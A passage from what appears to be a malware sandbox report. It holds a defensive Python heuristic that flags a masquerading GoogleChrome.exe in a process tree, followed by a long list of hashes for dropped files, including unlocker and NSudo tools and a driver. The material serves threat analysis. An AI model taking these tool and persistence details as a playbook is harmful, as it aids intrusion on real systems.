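            cur.cmdline = line  # first plain line after the image is the command line
    for i, p in enumerate(procs):  # parent = nearest preceding entry one level shallower
        p.parent_pid = next((q.pid for q in reversed(procs[:i]) if q.depth == p.depth - 1), None)
    return procs

# Heuristic, not from the report: browser-named image outside a trusted install root (assumed lists).
BROWSER_NAMES = {"chrome.exe", "googlechrome.exe", "msedge.exe", "firefox.exe"}
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")

def flag_masquerade(procs: list[Proc]) -> list[Proc]:
    def suspicious(image: str) -> bool:
        low = image.lower()
        return low.rsplit("\\", 1)[-1] in BROWSER_NAMES and not low.startswith(TRUSTED_ROOTS)
    return [p for p in procs if suspicious(p.image)]

def execution_counts(procs: list[Proc]) -> dict[str, int]:
    return dict(Counter(p.image for p in procs))

if __name__ == "__main__":
    procs = parse_tree(TREE_TEXT)
    print([(p.pid, p.parent_pid, p.image) for p in flag_masquerade(procs)])
    print({img: n for img, n in execution_counts(procs).items() if n > 1})
```

On this report the masquerade check returns only PID 2784 (`GoogleChrome.exe` in `%LOCALAPPDATA%`, parent PID 3448, the `cmd.exe` launcher), while both genuine `elevation_service.exe` entries under Program Files pass, and `dumer.exe` shows three separate executions. The same parser applies to the longer tree earlier on the page; only the depth convention and the heuristic lists need revisiting if they do not match what the analyst sees.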

Network

MITRE ATT&CK Enterprise v16

Downloads

• C:\Temper\5Suk4e8N.exe
  Filesize: 828KB
  MD5: 426ccb645e50a3143811cfa0e42e2ba6
  SHA1: 3c17e212a5fdf25847bc895460f55819bf48b11d
  SHA256: cf878bfbd9ed93dc551ac038aff8a8bba4c935ddf8d48e62122bddfdb3e08567
  SHA512: 1ab13e8e6e0ca4ca2039f104d53a5286c4196e930319c4fe374fa3bf415214bb7c7d2a9d8ca677a29c911a356cca19a1cecae16dd4bf840bce725f20de4c8ff2

• C:\Temper\HDfPAHEn.exe
  Filesize: 2.1MB
  MD5: b033523723d31e7aab8789899c3ac9de
  SHA1: ac6ea3213e25e1adbde7d7b12d44c8d3268fd8f7
  SHA256: 0d3e152a2e8d08fbf7e9e8dd11715686591dc4c0e7f7ebe1ca74508db735bbbe
  SHA512: 5696fc22f9825d9d7d42a2b2b3a8cf721849e2d78db64a50735c0eb9c964f9991828ea1e8c745bcef0012b0462324c114e96eefb619b1fdc1224db4c7aebed15

• C:\Temper\fhYewhdX.zip
  Filesize: 2.2MB
  MD5: 0a456352bb0cb18320283585729ea204
  SHA1: 43a0c065e8c7350bd432b74b45b42c83b1fc9a17
  SHA256: ad98143b4b73e45f22eb227a0b435dcdec7732a0ae413c8a677ddaf725dd6d54
  SHA512: 2d4f70c92e69f909f33367542ecf17d4c3a8e701cc0ac2d0349ca7a0489f17bac0a931b13ca61a2f6b9a9e20fe5f35d5f9326556524c31de18ee2ddded20900e

• C:\Temper\qUQ9sZlz.exe
  Filesize: 895KB
  MD5: 538104a9e59adea978c248b42622e2c2
  SHA1: 847c1c12a0dac338d6a6ad1b96c05c1b7f1dc879
  SHA256: 06afaa51fd3e08abef9a539cbf560d5183de32f01c3b1030068fed411a7acb7b
  SHA512: 9167fd29c15f1872afd4d75b496c9eaefe97bb4866efb666c6143e8706adb8fbb7abfd615d14689c27a5eb91ec25871d546f11f147abcd4c08a140aa0d1e21d2

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 25604a2821749d30ca35877a7669dff9
  SHA1: 49c624275363c7b6768452db6868f8100aa967be
  SHA256: 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
  SHA512: 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 16KB
  MD5: ca56bc4c909aa2a031a7480dd003f8da
  SHA1: 8df6e9e72c319088909d412aa2a43282ec1ee060
  SHA256: 464328c9b33c6fc402c4be07394d70be06dea98af2cae0cc7d474c5048fdecbd
  SHA512: ec3e549bc0066b8fe24dc12dcdb1622770775cb38c43135ba188f87b237918838f1701bae70815a1706b840ed29b03644a0fb3e75dc81331dbc5fccdc8ec7f9f

• C:\Users\Admin\AppData\Local\Temp\10495460101\index.exe
  Filesize: 3.2MB
  MD5: c6be3d696ae0f8323763bfc4c890424f
  SHA1: 1e3b68dc2ce1349e603bd20535cb41067b4ac9be
  SHA256: f9ccfcefd6e7400bd8d6b61abf3658382b8804cfa1958ee7b73b263a3930ae0e
  SHA512: c89f744ccde514e1729173932925d80d77949be0c25ec386f2af313ec7e1c98a7757d816fe6801574107484770c3647832e517eed6b51a5211f4e1de53ce3bff

• C:\Users\Admin\AppData\Local\Temp\10495480101\20563e3f9a.exe
  Filesize: 938KB
  MD5: 14fdfbe89b3ab7a13503dd169d856b14
  SHA1: 6842b9afbd27a456022c9bd9a8ac0e813ce8516f
  SHA256: b5e1a9300fd83141bf628c018e1ff16d0a482e3ecd003fc8184a7abfe7ccb9a0
  SHA512: 4e014c59871ffda55c11e4c38894777d60857aaed70cfa534d168ff13a376878940166606d76e90e9576ea0da91eacc275e416567d1553ac5a5b86620a1f00b4

• C:\Users\Admin\AppData\Local\Temp\10495790101\208f6d97e4.exe
  Filesize: 1.8MB
  MD5: 6938d25893509cfd7f08951c1c7bb28a
  SHA1: 778f1ed78179af28a48c223911b5e183a0267962
  SHA256: 87ebbbb4495841eb71534faaa30adbac1a999e73958ac3445dc7d3a58200e53f
  SHA512: a7b94b699fce03180810480d51fafaf947d30e9f8f7d6261306f1c93b78d97bcbf549f42140052570e33e80c0c298488a77866042dbfd0af463342138046330c

• C:\Users\Admin\AppData\Local\Temp\10495950101\amnew.exe
  Filesize: 415KB
  MD5: 9bf93861c32c3a2a30ea0d4d995ccc3f
  SHA1: 243cfa1eb61e18d710371c2e5c308ca0cb85b006
  SHA256: 3c7cd0b8620a6b6e75110c604f7f5ddd5cb51b9fbcf8cee963623ad0e04c4c19
  SHA512: 1765727f13713811ef71abe6a68219f83860d20851f45fc048d99413edfc61e509f9f6da2b2ac085f14b60cba81b13807e0aa2af7568cee3eef537aa52df84e1

• C:\Users\Admin\AppData\Local\Temp\10495960101\sFFG7Wg.exe
  Filesize: 231KB
  MD5: e8c399a261b2b3b978c789e0c3d77d65
  SHA1: 223fb0b1caf5d3ca38f87e82f235c6310d3476f0
  SHA256: da1a5fb86d21c58f2483f9af83bf9196053c981606f1a74d5d47c23d843d8f41
  SHA512: e68aa6e16b3d96768a5fa1f09fc9571f1da1bdc752da4aa88083f3865ecb3b7a5eff7941c617a160499c0a2faf4f85f4bdcceeffc558f9b69ab8298bd0306d7d

• C:\Users\Admin\AppData\Local\Temp\10495970101\Fv6kVbJ.exe
  Filesize: 2.0MB
  MD5: 427f268d10774bb4e27190e5a5d69921
  SHA1: 070fdc4da857e71fb70fbb21748552b299292425
  SHA256: 4c157555fd7e61dbf6609613e387591fd254724415105e0f205ed58fd1b32a79
  SHA512: b166990dae619803a21336384f2c079c43f14e91fe9a88b75b922b7ed9b67cd2232b4082bc0e83d1633eb91a9d2960fa7d140cd247178851140ab54e9979c9ff

• C:\Users\Admin\AppData\Local\Temp\10495980101\blOahSM.exe
  Filesize: 2.9MB
  MD5: 2d632f094e7c2f42696c158ae365ca47
  SHA1: b62cd4d3e5742a2d061504db75dbb66d73a7af82
  SHA256: 181910972449289a003645a257fbfc3f2f04238aabb37534ecb945bfe2b462db
  SHA512: 8fc106a34d63ba25bfb8e3cb44a36513eb2d6bf166d126351f83e38f61a3ea6e29438cbda17ac7cbe1b391dc16a9c391607597d7d51821085d394b87a24d4f35

• C:\Users\Admin\AppData\Local\Temp\10495990101\oSOnryg.exe
  Filesize: 2.5MB
  MD5: 3296211f0c497ac91a9b9b55d37701e7
  SHA1: 76af557835a239139f42b1791789ff2a44a5c5c7
  SHA256: 9c05fb7edf15fd71f18bd64c620a35aa8a3298fa79920b938e31c531484b8c3a
  SHA512: 5756785855661bdb2cefd8c539537a15d072275fff16b037b26040737bf74cf588817b26faeb4932e524ea580abfb84b5fd8fcefda3a8bfc3f74b3998217820e

• C:\Users\Admin\AppData\Local\Temp\10496000101\4eTHv9F.exe
  Filesize: 1.5MB
  MD5: 1d50c95627439b708a79fadcd37c4fa3
  SHA1: 92b47a5e5611d0616bdfc6fb44f92e261f138251
  SHA256: c6c04b1d3f2c01aee578d23a039600c1747140e573793e4301873362c5908a51
  SHA512: f5810566ce6d3d1bd0d1f0989a5375ba362e910b0588b8c6032aae39de8088d9811271159df53b8212d2aeed4b10225ef979414213e825bbf43fb320c0b5a106

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10496010101\kI81c4U.exe

                                                                                                                                            Filesize

                                                                                                                                            1.2MB

                                                                                                                                            MD5

                                                                                                                                            c433a1bf1311558a28d092d5202327b4

                                                                                                                                            SHA1

                                                                                                                                            040c0bac57ec17cffab3f50c6046cd49f5f582f2

                                                                                                                                            SHA256

                                                                                                                                            6003067a0d75ade3b7c4ee81d5df24781b529e67d8c272d63909e5734e9be525

                                                                                                                                            SHA512

                                                                                                                                            c89aa1f6b2330127937533840580e3b5f81e94976c8b2e401eba530d5db3b50d606da58d5ac4ddf03ab2410c0093b37a41d753cf6c58bc8b6e73fb17f6bcd6f7

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10496020101\EG11t89.exe

                                                                                                                                            Filesize

                                                                                                                                            103KB

                                                                                                                                            MD5

                                                                                                                                            dac1290f0d2bebcf3429760d62c12ab8

                                                                                                                                            SHA1

                                                                                                                                            25798c6dea855e9972c6e550cd13efd907026fc6

                                                                                                                                            SHA256

                                                                                                                                            4036fb3f16d7406abd08b6835cdef7811b72df0a8a7932f5c928a2317ffc4ea9

                                                                                                                                            SHA512

                                                                                                                                            5ba805166b95f09dde009e6bee902afab26b47038653c32b0534f638d0cfc1aba4a6e49972f84c64d97cb6878dacd1e23dc4485bb36ba8ee0206cf72dfeae529

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10496030101\texL7GT.exe

                                                                                                                                            Filesize

                                                                                                                                            1.2MB

                                                                                                                                            MD5

                                                                                                                                            f5353572130d43a00e5db6a00045b388

                                                                                                                                            SHA1

                                                                                                                                            ba043189793903acceb8e01d3f472b8871546f43

                                                                                                                                            SHA256

                                                                                                                                            af0a7aa49cac9fd7fffe23243b0cfcacc506c84f07449dc1e3702a587e4f2f0a

                                                                                                                                            SHA512

                                                                                                                                            79407c0b7baed7a61aaf64c712486586349051d7e2064889a0d48b55e3a1a97fc4f21c8e7f91be63998c2477547b996288564ed23fb54c6081f91945ce1f14ad

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10496040101\Bw5ZAOe.exe

                                                                                                                                            Filesize

                                                                                                                                            7.3MB

                                                                                                                                            MD5

                                                                                                                                            14d8ea2e66d596a466742e68279fe860

                                                                                                                                            SHA1

                                                                                                                                            54c31d3960170e43ce50f8b8c218b05593268cf1

                                                                                                                                            SHA256

                                                                                                                                            a156d2b61b0405b1b57b985670c249ff89145cfdea773597c512baf335b4b04d

                                                                                                                                            SHA512

                                                                                                                                            639b1b28945a7186e0b52fead331cd043f03860cb82f6b547d4a2f6ce3f5d28150f057fcd5127391c49c901aca91e3db9d28930ce05267c44bc9e6448ebf9bec

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7zr.exe

                                                                                                                                            Filesize

                                                                                                                                            889KB

                                                                                                                                            MD5

                                                                                                                                            91b137b3f99d2afef01e67b04acfef92

                                                                                                                                            SHA1

                                                                                                                                            6f5ad9bfe467483feceeca821870be4f6632b1ac

                                                                                                                                            SHA256

                                                                                                                                            8bdcdb0a2333d6bebd7c610dfd245166481dfcc78114257a322748a4e4352fe8

                                                                                                                                            SHA512

                                                                                                                                            58e884f7c79e81dd632b2cf34276b686870aedbf9729ce62fa523973756476e7b068d6eb1cd1f73ac92eaae40dc99c5ece4b046f826a989b3f44342dc29112b5

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker.zip

                                                                                                                                            Filesize

                                                                                                                                            1.2MB

                                                                                                                                            MD5

                                                                                                                                            6833604a8b0f0bd4e65f14d5dedb13fd

                                                                                                                                            SHA1

                                                                                                                                            050f0573f0bd12fc4fa57e0babf09391377f64dc

                                                                                                                                            SHA256

                                                                                                                                            f81163fe8e7c95157797f4d955bb6e9fcbb4c0e16a0798d459974e3320dab942

                                                                                                                                            SHA512

                                                                                                                                            ba5be4c8ad9a00185c3363921058e7ff9ebb469b8fb18c0626d3b9335b356b6601ad3e25399865228c7caf61a53f368f8efa75fae1e1d3be2bbd50f8f5d9cf8b

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.dll

                                                                                                                                            Filesize

                                                                                                                                            79KB

                                                                                                                                            MD5

                                                                                                                                            2c6233c8dbc560027ee1427f5413e4b1

                                                                                                                                            SHA1

                                                                                                                                            88b7d4b896539abd11a7ad9376ef62d6a7f42896

                                                                                                                                            SHA256

                                                                                                                                            37d2a1626dc205d60f0bec8746ab256569267e4ef2f8f84dff4d9d792aa3af30

                                                                                                                                            SHA512

                                                                                                                                            cc8b369b27b303dbe1daef20fa4641f0c4c46b7698d893785fa79877b5a4371574b1bb48a71b0b7b5169a5f09a2444d66e773d8bb42760cb27f4d48a286728a8

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

                                                                                                                                            Filesize

                                                                                                                                            2.6MB

                                                                                                                                            MD5

                                                                                                                                            2541290195ffe29716ebbc7aac76d82f

                                                                                                                                            SHA1

                                                                                                                                            d8e22adc26ef1628b826785682830c3d128a0d43

                                                                                                                                            SHA256

                                                                                                                                            eaa9dc1c9dc8620549fee54d81399488292349d2c8767b58b7d0396564fb43e7

                                                                                                                                            SHA512

                                                                                                                                            b6130c658cfeae6b8ed004cbac85c1080f586bb53b9f423ddabaeb4c69ea965f6bca8c1bd577795ef3d67a32a4bf90c515e4d68524c23866588864d215204f91

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.log

                                                                                                                                            Filesize

                                                                                                                                            9KB

                                                                                                                                            MD5

                                                                                                                                            7efb88f3d3804f8432fc0a8127afcdcc

                                                                                                                                            SHA1

                                                                                                                                            42449d9f00510d3f1673a1fc3183e75f485b0151

                                                                                                                                            SHA256

                                                                                                                                            c479e3e0dabc8009a20c077713d15240277dad9cc7c47db78bacb1c23121c375

                                                                                                                                            SHA512

                                                                                                                                            8c06d42d7101bb17f4fd608fd70d2d32dd250bfdf3e55d4be9ef9cc98ca46bdd8d7cbac5d407643225428e58717d2269eeb3ed58edba3e7789da0cf5130883a3

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.log

                                                                                                                                            Filesize

                                                                                                                                            9KB

                                                                                                                                            MD5

                                                                                                                                            149dd8215b66dd1cd1261a4add9ace01

                                                                                                                                            SHA1

                                                                                                                                            95c9b1dc263d57f5f81b26aef925faa481acd8f5

                                                                                                                                            SHA256

                                                                                                                                            dc00a09ec640c55dc183e8190ebdba798f4bfd6aeab285ef855b0e61ee7d585f

                                                                                                                                            SHA512

                                                                                                                                            3da5d0e4f46203a777fcd07b639ea2d1086f2729adaa831222f4b10a336c1548439af6c2d300e35eaae20a4512020eb58e9e67d7d3188f03d0de5af564c64226

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.log

                                                                                                                                            Filesize

                                                                                                                                            19KB

                                                                                                                                            MD5

                                                                                                                                            70068eb98d5010cce7c0b7f572e26f38

                                                                                                                                            SHA1

                                                                                                                                            3035224e109c92b12896cb7536f7fb5a249e0556

                                                                                                                                            SHA256

                                                                                                                                            9678cc13b9c4df124de7523c6e44821cc9a54cda92bcc17e222a310bd0e76975

                                                                                                                                            SHA512

                                                                                                                                            f79f3f18f230727505209afc46a84dcf8d999d6bc9eb5391664c4ec237f391487f2b352744432038739686d87fb108a2d167d529833d0340306b5d425cac2d32

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.log

                                                                                                                                            Filesize

                                                                                                                                            29KB

                                                                                                                                            MD5

                                                                                                                                            af1c31db4fed7671830283e039dc8647

                                                                                                                                            SHA1

                                                                                                                                            02e1f75b57f352d1ef315b69a12dbb82adba1d97

                                                                                                                                            SHA256

                                                                                                                                            568cef8c1540796f8e5ed1a41001711b083d207dcb963ebc887efa7828401810

                                                                                                                                            SHA512

                                                                                                                                            e75c7d4dda86120c036095307d01cc24a78ba389ce705b04aea39c580c0cca531c00229cbb1a7049317dc820860a3cf659768e30f4e3db53b1d6c77afbb51a8b

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.log

                                                                                                                                            Filesize

                                                                                                                                            38KB

                                                                                                                                            MD5

                                                                                                                                            44164fa23dc5b42cd76a9a3efe180dd7

                                                                                                                                            SHA1

                                                                                                                                            ef56bea15a1006e5eb3ba7f9aba75315975d6665

                                                                                                                                            SHA256

                                                                                                                                            c70fce873df7604e5657d7fffd307fc9e6889e85c8ce94c2cbeca4760106eed8

                                                                                                                                            SHA512

                                                                                                                                            42d7392f851ed93d5169050ec89a358d331e1e4be36a8a2d614e7e211aa5700438cbe269922ac5ff2d1d82ee50ce5bc63999d01c396c0c735a2c4af83bc14505

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.log

                                                                                                                                            Filesize

                                                                                                                                            57KB

                                                                                                                                            MD5

                                                                                                                                            b7dbcdfde64ed375ed643fc8ffb2ac0b

                                                                                                                                            SHA1

                                                                                                                                            6e80a51a9281f5994d6811726602b8f78c6dd0a5

                                                                                                                                            SHA256

                                                                                                                                            cbb6565ad9e655467ee711852d598c70d1b39c1c0cd1aabbe9ad7fc37b0eec21

                                                                                                                                            SHA512

                                                                                                                                            e40418472ffbe7be508a01197a3b88f6c11e53521a45adc537382d76b708bc577498a553341b8b00ccabbcae93a5f5639b6def247566423f4a76d1ff5ff6f4d1

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.log

                                                                                                                                            Filesize

                                                                                                                                            57KB

                                                                                                                                            MD5

                                                                                                                                            11acdf738767f96341ad2852347f7965

                                                                                                                                            SHA1

                                                                                                                                            2ccb7d9197c4487e16b6ab97a7e5e57667cf60a7

                                                                                                                                            SHA256

                                                                                                                                            2b918da035bbe7814c61f90ccc1938c34985487e9d2b8795555d686b53335076

                                                                                                                                            SHA512

                                                                                                                                            c49199c54c2fa3687c287fc131bba55d9485e8a66e80c7f5ea8f33191c0a5232e0f310876e8522ff9499b9305cbd614a55329b30f9d546043b4fad53962b964f

• C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.log
  Filesize: 67KB
  MD5: f216f66ba6cb9bd75d466c1bbcbb6728
  SHA1: 29b8883c25b1503b26dfab401feb1ffa2901ccd1
  SHA256: 858f32e8fc45438892fbbae078153a38c75178c97a6ab3f474267244033ffeff
  SHA512: cb4af63eeee499751473d086dab218bffd3d95e74c89ed61a971bdd0c58ac3cb0d6b2ae4eaa0fe109977444661942e12a38d5594646822dd0487964e8af6c55a

• C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.log
  Filesize: 86KB
  MD5: bde125918c1f7dfcb8197671a281a11e
  SHA1: 1141c723c0efd12da06d8dc5ad6839bed5c41f3a
  SHA256: 5080670e1b670800375587e5fc605988cf71bdc48b31eceb5dd16e4eb71e58c0
  SHA512: 9e57394bf45548f34638879c397c745de1e0de004c3557f30f5f3aecede3c9ed59ba37c1f7774ea2de91b17e82c4cfa21275140b181db7b6c5d594d0b9b4e975

• C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.log
  Filesize: 95KB
  MD5: fa29342721dcc11d581d231a6330da91
  SHA1: fd68498678c978d164c38fe4fb354da167662eba
  SHA256: bdc384433d8a0cfbafc0b744a407d7531b998c9520fff4eedfdeeb862e39c560
  SHA512: 85188915fd46df9ff599d671c72da4d4182735e18b7fe9df46ba5fc3826180fb5271930b397f4298fee485dea7c410b3d5f3a4b9c09de0dffe10565425aedf8e

• C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.sys
  Filesize: 40KB
  MD5: ac055b6c011b2e015de44154e2d46adb
  SHA1: abeedc8ac31eaee1948d3f56aa6c212cd9dc8c3a
  SHA256: 1845fe8545b6708e64250b8807f26d095f1875cc1f6159b24c2d0589feb74f0c
  SHA512: 34a6ef7bc7dce6ca0fa3f9add756912b893afe3997f9c431481dee04c8540f9b3721d2496ac31602c0e65364ac5cf6cbe6136052dfa55f90e2fd76d44917cbfe

• C:\Users\Admin\AppData\Local\Temp\Work\DKT.zip
  Filesize: 1.3MB
  MD5: 3d126de8237ed4afa30b8438d9db8611
  SHA1: 1c7643855e42da2e28cdd035b512311cbd79d67b
  SHA256: 97b6e28860f812d0b7eed00c31d96a2c61e99c4cc8cb2b14382ab6d5b99da5b7
  SHA512: ba4b20ffa8f10dae2afa8f6a095c45c6256f8d94c9866e19ac6eef9571ffd2a3fe49d10efb29f0b043e67a62cfd1b3f427ebd76ce1f5ecf2b4a26deee6c552eb

• C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe
  Filesize: 174KB
  MD5: 423129ddb24fb923f35b2dd5787b13dd
  SHA1: 575e57080f33fa87a8d37953e973d20f5ad80cfd
  SHA256: 5094ad359d8cf6dc5324598605c35f68519cc5af9c7ed5427e02a6b28121e4c7
  SHA512: d3f904c944281e9be9788acea9cd31f563c5a764e927bcda7bae6bedcc6ae550c0809e49fd2cf00d9e143281d08522a4f484acc8d90b37111e2c737e91ae21ce

• C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
  Filesize: 1.3MB
  MD5: 60a0942b8db42220c5a71f1babb66f5a
  SHA1: 4ea6d8edb772dd2d90f0812efda762af6d423201
  SHA256: 7fec52ce8d255f019bbb7d6774e4ac1765ccca95cff03daa5e7b90be340d87c3
  SHA512: db52fedbc1c5406ab513666e8f24ccffa2ceff9e04b97d170a9e67ed56f11c6b43faa7a75ae79411df6b708a2903df395b8f1b149bc73c4f2dd520643109fb9e

• C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe
  Filesize: 117KB
  MD5: 4a9da765fd91e80decfd2c9fe221e842
  SHA1: 6f763fbd2b37b2ce76a8e874b05a8075f48d1171
  SHA256: 2e81e048ab419fdc6e5f4336a951bd282ed6b740048dc38d7673678ee3490cda
  SHA512: 4716e598e4b930a0ec89f4d826afaa3dade22cf002111340bc253a618231e88f2f5247f918f993ed15b8ce0e3a97d6838c12b17616913e48334ee9b713c1957a

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_juawrguo.bhl.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj\Crashpad\settings.dat
  Filesize: 280B
  MD5: 7a5abb7dd67e81185f1a03cd114f5671
  SHA1: 472ef4899058536648688f49edcd92b488c2aae4
  SHA256: 5af9a7f5552e81414cb07fee5db5fd376ee5c41085c72cb44ab79d0cce1f5364
  SHA512: d8d171a55048af22f3041f4e2b286781b025b0dcf93212982f3c1db1cbbe4b24fe8036dae154a7aca1e31363f9e187d53823087cf3ed4408c009a675e5308c29

• C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj\Default\Code Cache\js\index
  Filesize: 24B
  MD5: 54cb446f628b2ea4a5bce5769910512e
  SHA1: c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
  SHA256: fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
  SHA512: 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

• C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
  Filesize: 192B
  MD5: ae92c28ce6f7c8dcdb2e1ea3cacec4ef
  SHA1: bbbaa9f101e5122a006b4e07428876a3de0892bb
  SHA256: d810a63d4ea43a2c2c6b19f8608f7a03e36f075f71add4a9dabd4a7de4288365
  SHA512: f7fa2f83073133c639605cd21f2f1a6642531bec50aeae4bfe1f74fdbb48e771c76210d55b94510ba9a1bf76308127c56ae213ac57b8c85855a288c2894f5c3f

• C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
  Filesize: 257B
  MD5: f0baa36ccd7c7a30f8ec0a120517aec6
  SHA1: 082b21336c60f22e5c5d5843dfb91f967ba3c247
  SHA256: d343f09230f8f930956489c9c074eb72ef0435d5e6fc03aa7a76f5100c4b3acb
  SHA512: fcabbb028e8a065752b67cb843f5bb2b4bc3cbd9b939489200d639e63e1883c98f302b406d521ec4c18dcfdd92cd6fec16844c4f1f8392bc6155e218e54f1251

• C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt~RFe5927c2.TMP
  Filesize: 119B
  MD5: dfbc2e6afd9ca8edf41eee381f39d283
  SHA1: 2457f62ed8137738dfde9ac2f42b1071631d9b84
  SHA256: 6b732be42d67601f3e76e9620c7083f20f816e0e2500765b12eee7f4b265cb5d
  SHA512: a9bf6eaaf95b308b69bd635bdab3549ac5bfbde1afcde8ac61e8615ca603ae82a51caa8fe0c533c46e6febf0b206816be8779679f4bb536e0dfbc63aa151e16a

• C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj\Local State
  Filesize: 4KB
  MD5: 6801d10428a08042c01522b02a6b7fe5
  SHA1: e7a2de31c695547723e6a7c4ebe78df7ba245cfa
  SHA256: 7d046df044dd5ab29ffdafdecdffd9e0b64d209bf8ba5a8d1525f00272d779a6
  SHA512: b23c77b007e750f1a8e71c912a6d803893fbe782f34a19e8d5fb4dd9d6c591b7162b7856a44bae36d289ad2597701c70e042c24b58860c638aeca3f8a29491fc

• C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj\Local State
  Filesize: 3KB
  MD5: 2632fac05ff1d8c19b8963b1d13f4455
  SHA1: 253d92d66c9d029b43664954319f15c52166403e
  SHA256: 27b6343cb7c81bfe481b98f29137a73e06e5db92b780c324a066665971b5a9c3
  SHA512: d4be45ee11ce79414f79cc92be2998c2251c3ad3820afa277f356af9cf5e4e950a2f5cec190f43abd52d544145868fd1ae6cb528c9f4f4f693687aca60798c9c

• C:\Users\Admin\AppData\Local\Temp\ehly5hpr.yjj\Local State~RFe591a25.TMP
  Filesize: 1KB
  MD5: 6b93555dc25ec5062e2819517f574af6
  SHA1: a018a7a4855b2a63a85f5f6ec3cf4a0719e82bc2
  SHA256: 24089b6fbe219d58d61b90cfd562bf0e1ec0d0317c5b8b07d8cc894bca389236
  SHA512: 25fb979a8f118ae030b8fb3451704bdcbbc96efb59ca2e4776eb87d471eadfe8e042c168099c0848c331318d528715bce6caebc76f30f0dd1a571d8e75729f1e

• C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng\Default\Extension Rules\CURRENT
  Filesize: 16B
  MD5: 46295cac801e5d4857d09837238a6394
  SHA1: 44e0fa1b517dbf802b18faf0785eeea6ac51594b
  SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
  SHA512: 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng\Default\Extension Scripts\MANIFEST-000001

                                                                                                                                            Filesize

                                                                                                                                            41B

                                                                                                                                            MD5

                                                                                                                                            5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                            SHA1

                                                                                                                                            d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                            SHA256

                                                                                                                                            f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                            SHA512

                                                                                                                                            de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng\Default\Network\SCT Auditing Pending Reports

                                                                                                                                            Filesize

                                                                                                                                            2B

                                                                                                                                            MD5

                                                                                                                                            d751713988987e9331980363e24189ce

                                                                                                                                            SHA1

                                                                                                                                            97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                            SHA256

                                                                                                                                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                            SHA512

                                                                                                                                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

